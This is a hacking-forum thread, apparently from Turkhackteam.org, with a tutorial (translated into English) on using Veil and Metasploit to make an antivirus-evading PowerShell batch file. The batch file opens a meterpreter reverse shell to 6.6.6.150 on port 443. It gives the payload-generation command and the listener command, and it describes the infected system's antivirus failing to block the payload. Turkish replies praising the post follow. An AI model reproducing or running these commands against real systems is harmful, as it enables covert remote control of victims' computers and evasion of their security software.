How to Bypass antiviruses running on Windows OS' using Kali Linux

Docok

Özel Üye
3 Haz 2011
2,680
22
KKTC, Lapta
In penetration tests often times a need to bypass antivirus programs appear. Using various encoding methods antiviruses can be bypassed. With programs such as Msfpayload, Msfencode and Msfvenom
creating various malwares with many features is possible. Below we are going to show you how to do this with an alternative and equally successful application called VEIL.

To create a batch file that can bypass the antiviruses on the Windows OS all we need for it to do is run the following commands. Access will be provided to the 6.6.6.150 IP on the 443rd Port by establishing a reverse connection.

Using the command below we can create a batch file. When the command has been executed our .bat extension malware will be created.

Kod:
root@kali:# veil -l powershell -p VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=6.6.6.150 LPORT=443

x8OBnk.png


KlXlYE.png


Before running the batch file on windows we will take the 443 port into listening mode.

443 port with the following command has been taken into listening mode with ****sploit. reverse_tcp has been used as payload.

Kod:
root@kali:# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=6.6.6.150 LPORT=443 E

Kr4rL1.png


We're running the undetectable.bat on Windows. When we start it the meterpreter shell greets us.

eQ5qXG.png


You can see below that the malware infected systems antivirus has done no blocking.

And with this bypassing the systems antivirus and gaining maximum level access is accomplished.

Translated from Shadow-mavi's thread. - /// Windows işletim sistemleri üzerinde çalışan antivirusleri atlatma ///Kali Linux:)
 
Son düzenleme:

Köstebek-02

Yaşayan Forum Efsanesi
6 May 2008
15,580
45
Köstebek
sen yeminle harika birisin babacanım:) eline yüregine sağlık başarılar dilerim ve gerçekten iyi düşünmüşsün babacanım:)
 

Veteran 7

El Patrón
26 Ara 2011
11,500
12,865
Eline sağlık Docok forum makalelerini ingilizceye çevirip yayınlayan ilk seni gördüm sanalda :) Güzel çalışma
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.